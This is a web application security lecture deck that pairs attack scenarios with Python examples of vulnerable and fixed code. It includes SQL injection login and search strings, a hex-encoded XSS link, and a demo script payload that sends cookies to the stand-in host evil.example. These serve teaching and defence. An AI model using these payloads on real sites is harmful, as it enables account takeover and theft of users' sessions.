Securing Web Applications - PowerPoint PPT Presentation

1
Securing Web Applications
  • Min Song
  • IS/CS698

2
Application Security
  • Applications are part of your security perimeter.

[Diagram: Internet / firewall / business network]
3
Application Security
  • Attackers won't attack your firewall.
  • They'll attack your applications.

4
Application Security
  • ...or they'll walk through the door (developers, administrators, users)

5
Application Security
  • ...or maybe just listen at the door (wireless, newsgroups, job ads)

[Diagram: information leaks past the firewall]
6
Web Application Exploits
  • Footprinting
  • URL Manipulation
  • Cross-Site Scripting (XSS)
  • SQL Injection
  • Session Hijacking
  • Error Exploitation

7
Footprinting
  • CNN mentions your website
  • Instant traffic jam
  • Database gets overloaded and goes down
  • Web application can't get a connection
  • (Developer couldn't do much about it, so the code lets the exception bubble up to the server)
  • The user sees a big, ugly Tomcat error message with all the gory details

8
Footprinting in Action
  • Pointy-haired boss
    - Finds it annoying and unprofessional
    - Calls you in to interpret technical mumbo-jumbo
  • Knowledgeable user
    - Learns which server versions are running
    - Learns the names of JavaServer Pages (JSPs) and other code components
    - Learns details about the database structure and naming

9
Footprinting in Action
  • Attacker
    - Looks up server vulnerabilities
    - Tries accessing default server config pages
    - Tries to cause other kinds of errors to collect more information
    - Tries a SQL injection attack
    - Uses the information to appear in-the-know during a social engineering attack

10
Footprinting Flavors
  • Errors (default application server behavior
    prints out all the ugly details)
  • HTTP Response Headers
  • Powered by logos
  • Distinctive URL patterns
  • Default stylesheets/skins
  • Press releases
  • Job ads
  • Newsgroup or message board postings

11
Footprinting Fixes
  • Configure default server-level error pages
  • Test what happens when
    - Resources are unavailable
    - Pages are not found
    - Bugs cause unhandled exceptions
  • Don't give details about errors the user can't fix (where possible, don't even admit that they're unexpected)
  • Don't give out specific product/version information, either in error messages or advertisements (that includes response headers such as Server and X-Powered-By)
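The fixes above, as an added example that is not part of the original slides: a stdlib-only WSGI middleware that strips version-advertising headers and turns any unhandled exception into a generic page with a reference id, while the stack trace goes to the server log. The wrapped application, its error message and the header values are constructed for the example.

```python
import logging
import traceback
import uuid

log = logging.getLogger("webapp")

# Headers that advertise product/version details to anyone who looks.
LEAKY_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-runtime"}


class DatabaseUnavailable(Exception):
    """Stand-in for the connection-pool error the slide describes."""


def fragile_app(environ, start_response):
    """Hypothetical application (constructed for this example): it leaks a
    version banner in a header and lets a database error bubble up unhandled."""
    if environ.get("PATH_INFO") == "/profile":
        # constructed message, in the style of a raw container stack trace
        raise DatabaseUnavailable("Cannot get connection from pool (Tomcat/6.0 Example-JSP)")
    start_response("200 OK", [("Content-Type", "text/plain"),
                              ("X-Powered-By", "JSP/2.1 Example/1.0")])
    return [b"hello"]


def hardened(app):
    """Wrap a WSGI app: strip version headers and replace any unhandled
    exception with a generic page plus a reference id. The full trace goes
    to the server log, where the operator (not the attacker) can find it."""
    def middleware(environ, start_response):
        def filtered_start_response(status, headers, exc_info=None):
            kept = [(k, v) for k, v in headers if k.lower() not in LEAKY_HEADERS]
            return start_response(status, kept, exc_info)

        try:
            return app(environ, filtered_start_response)
        except Exception:
            ref = uuid.uuid4().hex[:12]
            log.error("ref=%s path=%s\n%s", ref, environ.get("PATH_INFO"),
                      traceback.format_exc())
            body = ("Sorry, something went wrong. Reference: %s" % ref).encode()
            start_response("500 Internal Server Error",
                           [("Content-Type", "text/plain"),
                            ("Content-Length", str(len(body)))])
            return [body]
    return middleware


def run(app, path):
    """Minimal in-process WSGI driver: returns (status, headers, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, list(headers)

    body = b"".join(app({"PATH_INFO": path, "REQUEST_METHOD": "GET"}, start_response))
    return captured["status"], dict(captured["headers"]), body.decode()


if __name__ == "__main__":
    print(run(fragile_app, "/"))                   # leaks X-Powered-By
    print(run(hardened(fragile_app), "/"))         # header stripped
    print(run(hardened(fragile_app), "/profile"))  # generic 500 with reference id
```

The reference id is what the "pointy-haired boss" reads out over the phone; the operator greps the log for it and gets the full trace, so nothing is lost by hiding it from the browser.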

12
URL Manipulation
  • User gets an email notification with an invitation to visit her online profile at
  • http://www.acme.com/profile?userid=2249
  • Cuts and pastes the link into the browser
  • Accidentally leaves off the 9
  • http://www.acme.com/profile?userid=224
  • Gets a page with somebody else's personal information

13
URL Manipulation in Action
  • Pointy-haired boss
    - Gets confused
    - Starts worrying about his own privacy
  • Knowledgeable user
    - Removes her own personal info immediately
    - Gets curious and looks through the other person's information
    - Tries a few more IDs to see what happens

14
URL Manipulation in Action
  • Attacker
    - Looks for other URLs on the site that can be manipulated
    - Finds admin functionality that shouldn't be available
    - Writes a script to scrape confidential information
    - Tries to guess other people's usernames and passwords based on their personal details (username, birthday, etc.)
    - Uses personal info to impersonate others
    - Calls users and poses as a company representative who is looking at the same profile screen and needs to confirm username and password
    - Asks the company for ransom
    - Uses email addresses to launch cross-site scripting attacks against users

15
URL Manipulation Flavors
  • Manipulating cookies
  • Manipulating form data
    - Both POSTs and GETs
    - Hidden form fields
    - <select> values
  • Fishing for errors (footprinting)
  • Fishing for directory listings
  • Fishing for admin pages
  • Fishing for temp files (index.old, index.html)

16
URL Manipulation Fixes
  • Never trust client-side information
  • If you must rely on client-side tokens, sign and
    encrypt them
  • Use programmatic security checks to implement
    row-level security
  • Store authentication details in server-side
    session, or re-check every time
  • Watch out for temp files
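An added example (not from the slides) of the first three fixes for the acme.com profile bug: a row-level check that compares the requested userid against the server-side session, and an HMAC-signed token for the case where a userid really must travel in a link. The profile table, the key and the token layout are assumptions made for the example; the token is signed, not encrypted, so it proves integrity but does not hide the userid.

```python
import base64
import binascii
import hashlib
import hmac
import time

# Assumption: in real code the key comes from a secret store, not from source.
SECRET_KEY = b"example-only-key-do-not-use"

# Constructed profile table standing in for the acme.com database.
PROFILES = {
    224: {"name": "Alice", "email": "alice@example.com"},
    2249: {"name": "Bob", "email": "bob@example.com"},
}


class Forbidden(Exception):
    pass


def profile_vulnerable(userid):
    """The slide's bug: the userid in the URL is trusted as-is."""
    return PROFILES[userid]


def profile_fixed(session_userid, requested_userid):
    """Row-level check: the authenticated user may only read their own row.
    session_userid comes from server-side session state, never from the URL."""
    if session_userid != requested_userid:
        raise Forbidden("user %d may not read profile %d" % (session_userid, requested_userid))
    return PROFILES[requested_userid]


def handle_profile_request(session_userid, requested_userid):
    """Request handler view: Forbidden becomes a 403 rather than a 500."""
    try:
        return 200, profile_fixed(session_userid, requested_userid)
    except Forbidden:
        return 403, None


def make_token(userid, expires_at):
    """Signed (not encrypted) token: userid.expiry.HMAC-SHA256. Changing any
    byte of the payload invalidates the signature."""
    payload = b"%d.%d" % (userid, int(expires_at))
    sig = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload + b"." + sig).decode("ascii")


def verify_token(token, now=None):
    """Return the userid if signature and expiry check out, else None."""
    now = time.time() if now is None else now
    try:
        raw = base64.urlsafe_b64decode(token.encode("ascii"))
        uid, exp, sig = raw.split(b".", 2)  # the digest may itself contain '.'
        expected = hmac.new(SECRET_KEY, uid + b"." + exp, hashlib.sha256).digest()
        if not hmac.compare_digest(sig, expected):  # constant-time comparison
            return None
        if int(exp) < now:
            return None
        return int(uid)
    except (binascii.Error, ValueError, UnicodeEncodeError):
        return None


def tamper(token, old, new):
    """What the URL-editing user does: rewrite the userid inside the token."""
    raw = base64.urlsafe_b64decode(token.encode("ascii"))
    return base64.urlsafe_b64encode(raw.replace(old, new, 1)).decode("ascii")
```

Even with a valid token, the handler still runs the row-level check: the token only says who clicked the link, the authorization decision stays on the server.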

17
Cross-Site Scripting (XSS)
  • John visits an online bookstore
  • He copies the following book title from an HTML email message
  • <b>Architect's Checklist</b>
  • Pastes it into the search box
  • Website displays the search terms in bold along with the results

18
XSS In Action
  • Knowledgeable user
    - Plays with search terms to see what else can get through
  • Attacker
    - Tries entering JavaScript and watches it get executed when the form is submitted
    - Looks at the name of the search form field and figures out how to specify it through the URL
    - Sends an IM to a friend with a link that goes to that site and displays a funny pop-up saying "You've been hacked!"

19
XSS In Action
  • Attacker
    - Constructs some JavaScript that reads a cookie and resubmits it to a different site (under his control)
    - Hex encodes it so it's not obvious in a URL
    - http://ebay.com/SendFeedback?feedback=223e3c7363726970743e646f63756d656e2e6e
    - Emails the link to hundreds of users with a message asking them to participate in a survey
    - Expects many of them to click the link
    - Expects that many of them are configured to auto-login
    - Collects cookies as they're sent to the site
    - Logs in and uses their accounts

20
XSS Flavors
  • Code Flaws
    - Feedback, reviews, message boards, etc.
    - Error messages that quote user input
    - Search results (with terms)
    - Public user profiles
    - Trusted partner content
  • Exploits
    - Cookie/session theft
    - Execution of fraudulent transactions
    - Access to confidential information

21
XSS Fixes
  • Validate all user input
  • Never redisplay user input without cleaning out any HTML and JavaScript
  • Filter out whatever you can
  • If you must display it verbatim, escape every character the browser would treat as markup (< > & " ') using the rules of the context it lands in (HTML text, attribute value, URL parameter). Wrapping the text in <pre> tags is not a fix: the browser still parses tags inside <pre>.
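The bookstore search page, as an added example that is not part of the original slides: the reflecting version, the <pre> "workaround", and a version that escapes per output context with the standard library. The result list is constructed for the example.

```python
import html
import urllib.parse

# Constructed search results for the bookstore example.
RESULTS = ["Architect's Checklist", "Clean Code"]


def render_search_vulnerable(term, results=RESULTS):
    """The bookstore's bug: the search term is copied verbatim into the page."""
    items = "".join("<li>%s</li>" % r for r in results)
    return "<p>Results for <b>%s</b></p><ul>%s</ul>" % (term, items)


def render_in_pre(term):
    """The <pre> workaround changes layout only; the browser still parses
    tags inside <pre>, so injected script runs just the same."""
    return "<pre>%s</pre>" % term


def render_search_fixed(term, results=RESULTS):
    """Escape per output context: HTML text and attribute values with
    html.escape (quote=True also escapes the quote characters), URL
    parameters with urllib.parse.quote. The raw term never reaches the page."""
    safe_term = html.escape(term, quote=True)
    items = "".join("<li>%s</li>" % html.escape(r, quote=True) for r in results)
    link = "/search?q=" + urllib.parse.quote(term, safe="")
    return ("<p>Results for <b>%s</b></p><ul>%s</ul>"
            '<a href="%s" title="%s">permalink</a>'
            % (safe_term, items, html.escape(link, quote=True), safe_term))


if __name__ == "__main__":
    payload = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"
    print(render_search_vulnerable(payload))
    print(render_search_fixed(payload))
```

The attribute case is why quote=True matters: a term such as `" onmouseover="alert(1)` would otherwise close the title attribute and add an event handler, even though it contains no angle brackets at all.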

22
SQL Injection
  • Erin visits a site and searches for
  • Architect's Checklist
  • She gets an error that says
  • "Sorry, an unexpected error has occurred: Invalid SQL Syntax"

23
SQL Injection in Action
  • Pointy-haired boss
    - Tries the search again
    - Assumes the site is broken
  • Knowledgeable user
    - Realizes that the single quote is often used in SQL statements to surround text
    - Tries searching for "architect checklist" (no apostrophe)
    - Gets results

24
SQL Injection in Action
  • Attacker
    - Views the HTML source for the page to look for field names that might match the database columns
    - Imagines the SQL to be something like
      select name, isbn from book where name like 'architects checklist'
    - Gets the full list by searching for: foo' or name like '
    - Tries logging in as foo' and gets the error
    - Tries logging in as
      Username: foo
      Password: bar' or username='admin
    - Gets a page that says "Welcome, admin"

25
SQL Injection Flavors
  • Code for advanced searches and other criteria screens constructs the query using string concatenation
  • Authentication module constructs the login query using string concatenation
  • Database or driver doesn't bind parameters

26
SQL Injection Fixes
  • Use PreparedStatements (bind every user-supplied value as a parameter; this is the actual fix, the rest is defense in depth)
  • Validate all user input
  • Strip out special characters (secondary only: quoting rules differ per database, and "Architect's Checklist" legitimately contains an apostrophe)
  • Never display SQL error messages to the user
  • Use different field names for the user interface and the database
  • Turn off unused database features
  • Limit database user privileges
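The login and search queries from the Erin/attacker scenario, as an added example (not the slides' code) run against an in-memory SQLite database: string concatenation beside the bound-parameter version, so the `bar' or username='admin` password and the `foo' or name like '` search can be tried against both. Schema, rows and ISBNs are constructed for the example; passwords are stored in clear only to keep it short.

```python
import sqlite3


def setup():
    """In-memory schema seeded with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (username text, password text)")
    db.executemany("insert into users values (?, ?)",
                   [("admin", "s3cret"), ("erin", "pa55word")])
    db.execute("create table book (name text, isbn text)")
    db.executemany("insert into book values (?, ?)",
                   [("Architect's Checklist", "0-000-00001-1"),
                    ("Clean Code", "0-000-00002-2")])
    return db


def login_vulnerable(db, username, password):
    """String concatenation: the login query the attacker imagined."""
    sql = ("select username from users where username = '%s' and password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Bound parameters: the values never become part of the SQL text."""
    row = db.execute("select username from users where username = ? and password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(db, term):
    """An apostrophe in the term breaks the quoting (Erin's 'Invalid SQL
    Syntax' error); a crafted term widens the query instead."""
    sql = "select name, isbn from book where name like '%%%s%%'" % term
    return [name for name, _isbn in db.execute(sql)]


def search_fixed(db, term):
    """The wildcard is part of the bound value, so the term is only ever data."""
    return [name for name, _isbn in db.execute(
        "select name, isbn from book where name like ?", ("%" + term + "%",))]


def try_search(search, db, term):
    """Run a search and report either the names or the database error text,
    which is what the slides' unguarded error page showed the user."""
    try:
        return search(db, term)
    except sqlite3.OperationalError as exc:
        return "error: %s" % exc


if __name__ == "__main__":
    db = setup()
    print(login_vulnerable(db, "foo", "bar' or username='admin"))  # admin
    print(login_fixed(db, "foo", "bar' or username='admin"))       # None
    print(try_search(search_vulnerable, db, "Architect's"))         # error: ...
    print(search_fixed(db, "Architect's"))                          # the book
```

The concatenated login query becomes `username = 'foo' and password = 'bar' or username='admin'`, and SQL's precedence (AND before OR) makes the second disjunct win; with placeholders the whole string is compared as a password and matches nothing.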

27
Session hijacking/replay
  • "What a boring presentation"
  • Brian pops open his laptop and connects to the hotel's wireless network
  • Browses his web mail

28
Session hijacking in Action
  • Attacker
    - Fires up a wireless sniffer such as Kismet
    - Watches Brian's information go by
    - Notices him making requests to a web-based mail service
    - Reads his email as it goes by

29
Session hijacking in Action
  • Attacker (continued)
    - Wonders what other mail Brian keeps on the server
    - Grabs Brian's session cookie as it goes by
    - Makes her own request to the mail server with that cookie and is automatically logged in
    - Reads through Brian's saved messages to find all sorts of usernames and passwords

30
Session hijacking Flavors
  • Network sniffing
    - To be fair, a lot of the 802.11 problem is on Brian's side, since he's browsing in the clear over the airwaves
  • Cookie theft (e.g. through XSS)
  • Brute forcing session IDs
    - Trying over and over until a valid session is found
    - Computing the next session ID by observing the algorithm the server uses to generate them

31
Session hijacking Fixes
  • Run everything over HTTPS
  • At least, run all confidential information over HTTPS
  • Don't write your own simple session management
  • If you do write something
    - use session IDs long enough and random enough that they can be neither brute forced nor predicted
    - match the session key to the IP address (caveat: users behind NAT, proxies or mobile networks change addresses legitimately, so treat a mismatch as a signal rather than an automatic failure)
    - alter the session on every request so that you can detect duplicates (a replay of a captured ID then fails)
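An added example (not the slides' code) of the "if you do write something" bullets: a server-side session store whose cookie carries only a random opaque id, rotates the id on every request so a captured id cannot be replayed, and optionally binds the session to the client address. Cookie attribute names are the standard Set-Cookie ones; the timeout value and store layout are assumptions for the example.

```python
import secrets
import time


class SessionStore:
    """Server-side session store. The cookie carries only an opaque random id;
    user identity, client address and timestamps live on the server."""

    ID_BYTES = 32  # 256 bits from the OS CSPRNG: neither guessable nor predictable

    def __init__(self, idle_timeout=900):
        self._sessions = {}
        self.idle_timeout = idle_timeout
        self.ip_mismatches = []  # recorded when bind_ip=False, for log analysis

    def create(self, user, client_ip, now=None):
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(self.ID_BYTES)
        self._sessions[sid] = {"user": user, "ip": client_ip, "seen": now}
        return sid

    @staticmethod
    def cookie_header(sid):
        """Secure: only sent over HTTPS, so the sniffer on the hotel wireless
        sees nothing. HttpOnly: not readable by injected script, so XSS cannot
        simply ship it off-site."""
        return "Set-Cookie: sid=%s; Secure; HttpOnly; SameSite=Lax; Path=/" % sid

    def resume(self, sid, client_ip, now=None, bind_ip=True):
        """Validate a presented id and rotate it: the old id is consumed, so a
        replay of a captured id fails. Returns (user, new_sid) or (None, None)."""
        now = time.time() if now is None else now
        s = self._sessions.pop(sid, None)  # one-time use
        if s is None:
            return None, None
        if now - s["seen"] > self.idle_timeout:
            return None, None
        if s["ip"] != client_ip:
            # Caveat: NAT, proxies and mobile networks change addresses
            # legitimately. With bind_ip=False the mismatch is only recorded.
            if bind_ip:
                return None, None
            self.ip_mismatches.append((s["user"], s["ip"], client_ip))
        s["seen"] = now
        new_sid = secrets.token_urlsafe(self.ID_BYTES)
        self._sessions[new_sid] = s
        return s["user"], new_sid


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("brian", "10.0.0.5")
    print(store.cookie_header(sid))
    print(store.resume(sid, "10.0.0.5"))   # ('brian', <new id>)
    print(store.resume(sid, "10.0.0.5"))   # (None, None): old id already consumed
```

Rotation has a cost the slide does not mention: two legitimate requests racing with the same id (parallel tabs) will see one of them rejected, so production stores usually keep the previous id valid for a short grace period.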

32
Error exploitation
  • Erin visits a travel site and starts browsing for
    8-day Alaskan cruises
  • She finds one she likes and sees that there are
    40 cabins left
  • She starts to book the only remaining deluxe
    cabin, but her credit card is declined
  • She tries to rebook with a different credit card,
    but the deluxe cabin is taken

33
Error exploitation in Action
  • Pointy-haired boss
    - Books an Economy cabin
  • Knowledgeable user
    - Calls to verify that it's not still reserved based on her aborted booking attempt
    - Finds out that the cabin was accidentally reserved and is really available

34
Error exploitation in Action
  • Attacker
    - Books a bunch of cabins (using fake credit card numbers, through an anonymous web redirector)
    - Waits to see how long it takes for the company to realize they weren't really booked
    - Calls at the last minute and gets a great deal since they're so undersold

35
Error exploitation Flavors
  • Time-consuming processes
  • Reliance on cached values of prices or other data (that may have been manipulated)
  • Broken/misconfigured transactions
    - Multiple operations may not be correctly grouped into transactions
    - Transaction rollback may leave the database consistent, but not revert changes to cached data or other application state

36
Error exploitation Fixes
  • Ensure that all modification is transactional
  • Be careful that cached values are properly
    flushed when transactions roll back
  • Enforce performance goals
  • Watch logs for unusual error patterns (automate
    this!)
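The cruise booking from the Erin scenario, as an added example that is not part of the original slides: a buggy booking that decrements a cached "cabins left" count before the card is charged, so a declined card rolls back the row but not the cache, beside a version that keeps the reservation and the charge in one transaction and drops the cache entry whichever way it ends. The inventory, the payment stub (card numbers starting with 4 are accepted) and the cache layout are constructed for the example.

```python
import sqlite3


class CardDeclined(Exception):
    pass


def charge(card_number):
    """Constructed stand-in for the payment gateway."""
    if not card_number.startswith("4"):
        raise CardDeclined(card_number)


def setup():
    """Constructed cruise inventory: one deluxe cabin and two economy cabins."""
    # isolation_level=None: the sqlite3 module opens no implicit transactions,
    # so BEGIN/COMMIT/ROLLBACK below are exactly what runs.
    db = sqlite3.connect(":memory:", isolation_level=None)
    db.execute("create table cabin (id integer primary key, cls text, reserved integer default 0)")
    db.executemany("insert into cabin (cls) values (?)",
                   [("deluxe",), ("economy",), ("economy",)])
    return db


def remaining_in_db(db, cls):
    return db.execute("select count(*) from cabin where cls = ? and reserved = 0",
                      (cls,)).fetchone()[0]


class Bookings:
    def __init__(self, db):
        self.db = db
        self.cache = {}  # cls -> remaining count: the "cached value" of the flavors slide

    def remaining(self, cls):
        if cls not in self.cache:
            self.cache[cls] = remaining_in_db(self.db, cls)
        return self.cache[cls]

    def book_buggy(self, cabin_id, cls, card_number):
        """Decrements the cached count and reserves the row before the payment
        step. ROLLBACK reverts the row, but nothing reverts the cache, so the
        site keeps showing the cabin as taken."""
        self.cache[cls] = self.remaining(cls) - 1
        self.db.execute("begin")
        self.db.execute("update cabin set reserved = 1 where id = ? and reserved = 0", (cabin_id,))
        try:
            charge(card_number)
            self.db.execute("commit")
        except CardDeclined:
            self.db.execute("rollback")
            raise

    def book_fixed(self, cabin_id, cls, card_number):
        """Reserve and charge inside one transaction, refuse a cabin that is
        already taken, and drop the cache entry on commit and rollback alike."""
        self.db.execute("begin")
        try:
            cur = self.db.execute("update cabin set reserved = 1 where id = ? and reserved = 0",
                                  (cabin_id,))
            if cur.rowcount != 1:
                raise ValueError("cabin %d is not available" % cabin_id)
            charge(card_number)
            self.db.execute("commit")
        except Exception:
            self.db.execute("rollback")
            raise
        finally:
            self.cache.pop(cls, None)


def attempt(fn, *args):
    """Run a booking and report the outcome by name instead of raising."""
    try:
        fn(*args)
        return "booked"
    except (CardDeclined, ValueError) as exc:
        return type(exc).__name__
```

The attacker's run of fake-card bookings leaves the buggy site showing cabins as sold while the database says otherwise; with the fixed version every failed attempt ends with the cache empty and the next page view reads the true count.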

37
Always remember
  • Don't trust or display user input until you've cleaned and validated it
  • Don't use HTML comments to describe dynamic code
  • Keep control over your error messages
  • Don't advertise details about your network, servers, databases or code
  • Implement row-level security
  • Log everything (and analyze the logs)